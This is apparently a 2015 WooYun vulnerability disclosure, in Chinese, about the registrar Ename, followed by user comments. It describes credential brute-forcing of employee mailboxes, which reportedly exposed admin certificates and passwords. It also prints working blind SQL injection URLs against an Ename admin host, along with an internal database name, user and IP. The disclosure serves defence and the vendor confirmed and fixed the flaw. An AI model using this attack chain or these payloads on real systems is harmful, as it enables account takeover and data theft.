漏洞概要
关注数(24)
关注此漏洞
漏洞标题:企业应用安全的软肋之易名中国(部分域名劫持、后台漫游、sql注入等)
提交时间:2015-05-09 14:45
修复时间:2015-06-25 08:54
公开时间:2015-06-25 08:54
漏洞类型:账户体系控制不严
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-05-09: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开
简要描述:
企业应用安全的软肋之易名中国(部分域名劫持、后台漫游、sql注入等)
易名中国在乌云只有5个漏洞,安全性还蛮牛的,尝试了一些正面方式都没能搞定,于是只能采用很黄很暴力的方式了
U.CC 看着直流口水的域名(´Д`)
详细说明:
http://mail.ename.com
邮箱账号测试了好几种命名方式,最后发现ename的邮箱账号命名方式为:
姓+名字缩写@ename.com
利用常见姓名作为用户字典进行爆破 获得几个弱口令账号
由于邮箱内没有完整的企业邮箱通讯录,只能想其他办法
找到关于腾讯办公QQ的信息 登陆之 获得员工列表 整理继续爆破之
获得如下弱口令邮箱(大的互联网企业的通病,人)
邮箱内共计找到10枚后台p12证书
各种密码若干
确认后请找乌云官方的人打码
漏洞证明:
看着这个域名直流口水
后台是存在sql注入的:
http://managenew.ename.cn/index.php/finance/index?enameId=972601-length(database())&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),1,1))&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),2,1))&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),3,1))&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),4,1))&submit=查询&email=2929904071%40qq.com#
http://managenew.ename.cn/index.php/finance/index?enameId=972601-ascii(substr(database(),5,1))&submit=查询&email=2929904071%40qq.com#
12位
后面顺延 就不都写了
库名:ename_member
数据库用户名:sdkUsereNa@192.168.20.75
修复方案:
求礼物
如果是真正的黑客攻击,修复时需要注意:邮箱是否留有转发后门,是否被恶意设置了密保(虽然我没留后门,但好多企业修复都只是改改密码,根本不会注意这些地方。(´Д`))
邮箱攻击的好处在于,一次成功的攻击过后,黑客可以收集到大量信息(如邮箱通讯录,同样可能是其他系统的用户名),在漏洞修复之后,黑客还可以使用收集到的信息二进宫。
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-05-11 08:53
厂商回复:
非常感谢!请继续帮我们寻找漏洞,让我们的平台更安全。
最新状态:
暂无
漏洞评价:
评论
-
2015-05-09 14:47 |
s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)
-
2015-05-09 14:48 |
李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)
-
2015-05-09 14:57 |
Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)
-
2015-05-09 14:58 |
园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)
-
2015-05-09 14:58 |
明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)
-
2015-05-09 15:20 |
an0nym0u5 ( 普通白帽子 | Rank:172 漏洞数:31 )
-
2015-05-09 15:40 |
PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)
-
2015-05-09 15:49 |
北京方便面 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)
好快的响应速度,出去吃点儿东西,回来就发现证书都失效了
-
2015-05-09 16:26 |
辛巴 ( 普通白帽子 | Rank:231 漏洞数:83 | 现实中的无能为力,不代表网络中也要低声下...)
-
2015-05-09 19:49 |
红糖哥 ( 实习白帽子 | Rank:70 漏洞数:8 | 红糖暖胃不暖逼)
北京方便面 蹲号子的时候晚上宵夜~记忆犹新啊。冷水泡北京泡面,只有料包没油包~
-
2015-05-09 21:53 |
only_admin ( 路人 | Rank:11 漏洞数:5 | ~~~~我只是个孩子╭(°A°`)╮~~~~)
-
2015-06-25 09:39 |
继续沉默 ( 实习白帽子 | Rank:62 漏洞数:9 | 好好学习,天天向上)
-
2015-06-25 09:46 |
JGHOOluwa ( 普通白帽子 | Rank:206 漏洞数:32 | 就是来看看大牛们如何超神的^-^)
“邮箱是否留有转发后门,是否被恶意设置了密保(虽然我没留后门,但好多企业修复都只是改改密码,根本不会注意这些地方)。”这条提的真是好,曾经就遇到过一个企业只是修改密码,后来发现还是遭受黑客攻击,最后发现留了转发后门!